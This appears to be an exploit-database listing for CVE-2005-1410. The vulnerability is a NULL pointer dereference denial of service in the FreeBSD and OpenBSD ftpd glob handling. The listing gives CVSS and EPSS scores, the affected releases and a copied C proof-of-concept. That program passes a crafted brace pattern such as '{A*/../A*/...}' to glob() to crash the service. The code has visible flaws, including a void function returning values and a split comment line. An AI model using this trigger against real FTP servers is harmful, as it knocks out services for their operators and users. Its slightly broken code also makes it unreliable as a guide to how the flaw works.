Advertisement






FreeBSD / OpenBSD ftpd NULL pointer dereference denial of service

CVE Category Price Severity
CVE-2005-1410 CWE-476 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2010-03-16
CPE
cpe:cpe:/a:freebsd:ftpd
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H 0.30232 0.89477

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010030051

Below is a copy:

/*FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability
 
The FreeBSD and OpenBSD 'ftpd' service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.
 
Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
 
This issue affects the following releases:
 
FreeBSD 8.0, 6.3, 4.9
OpenBSD 4.5 and 4.6
 
PoC:
*/
 
#include <glob.h>
#include <stdio.h>
 
#define MAXUSRARGS      100
#define MAXGLOBARGS     1000
 
void do_glob() {
        glob_t gl;
        char **pop;
 
        char buffer[256];
        strcpy(buffer, "{A*/../A*/../A*/../A*/../A*/../A*/../A*}");
 
        int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
        memset(&gl, 0, sizeof(gl));
        gl.gl_matchc = MAXGLOBARGS;
        flags |= GLOB_LIMIT;
        if (glob(buffer, flags, NULL, &gl)) {
                printf("GLOB FAILED!n");
                return 0;
        }
        else
//                for (pop = gl.gl_pathv; pop && *pop && 1 <
(MAXGLOBARGS-1);
                for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
                     pop++) {
                        printf("glob success");
                        return 0;
                }
        globfree(&gl);
}
 
main(int argc, char **argv) {
        do_glob();
        do_glob();
}



Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.